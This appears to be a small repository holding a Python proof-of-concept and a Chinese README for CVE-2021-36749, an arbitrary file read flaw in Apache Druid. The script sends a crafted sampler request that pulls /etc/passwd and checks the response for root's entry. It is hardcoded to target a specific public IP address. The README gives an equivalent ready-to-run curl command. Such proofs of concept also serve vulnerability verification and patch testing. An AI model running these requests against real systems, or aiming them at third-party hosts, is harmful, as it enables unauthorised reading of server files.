├── CVE-2021-36749.py
└── README.md


/CVE-2021-36749.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # -*- coding: utf-8 -*-
 3 | import requests
 4 | 
 5 | class Poc(object):
 6 | 
 7 | 
 8 |     def verify(self, data):
 9 |         url = data['url'].strip('/') + '/druid/indexer/v1/sampler?for=connect'
10 |         headers = data['headers']
11 |         json_data = {"type": "index", "spec": {"type": "index", "ioConfig": {"type": "index", "firehose": {"type": "http", "uris": ["file:///etc/passwd"]}}, "dataSchema": {"dataSource": "sample", "parser": {"type": "string", "parseSpec": {"format": "regex", "pattern": "(.*)", "columns": ["a"], "dimensionsSpec": {}, "timestampSpec": {"column": "!!!_no_such_column_!!!", "missingValue": "2010-01-01T00:00:00Z"}}}}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
12 |         try:
13 |             response = requests.post(url, headers=headers, json=json_data, timeout=10, verify=False, allow_redirects=False)
14 |             response_text = response.text
15 |             if 'root:x:0' in response_text:
16 |                 return {
17 |                     'title': '{} 存在Apache Druid任意文件读取漏洞(CVE-2021-36749)'.format(url),
18 |                     'desc': '{} 存在Apache Druid任意文件读取漏洞, 返回内容为: {}'.format(url, response_text)
19 | 
20 |                 }
21 |         except Exception:
22 |             pass
23 | 
24 | 
25 | if __name__ == "__main__":
26 |     p = Poc()
27 |     r = p.verify({
28 |         'url': 'http://212.83.189.211:8888',
29 |         'headers': {}
30 |     })
31 |     print(r)
32 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2021-36749
 2 | Apache Druid 任意文件读取
 3 | 
 4 | 受影响版本：version <= 0.21.1
 5 | 
 6 | 使用以下两种方式均可
 7 | 
 8 | ## 命令行方式
 9 | 
10 | ```bash
11 | curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
12 | ```
13 | 
14 | ## 图形界面方式
15 | 
16 | ![1](https://i.loli.net/2021/10/14/bj27OYBhLDQSUw4.png)
17 | 
18 | ![2](https://i.loli.net/2021/10/14/rGORHBnSfoesXhA.png)
19 | 
20 | 


--------------------------------------------------------------------------------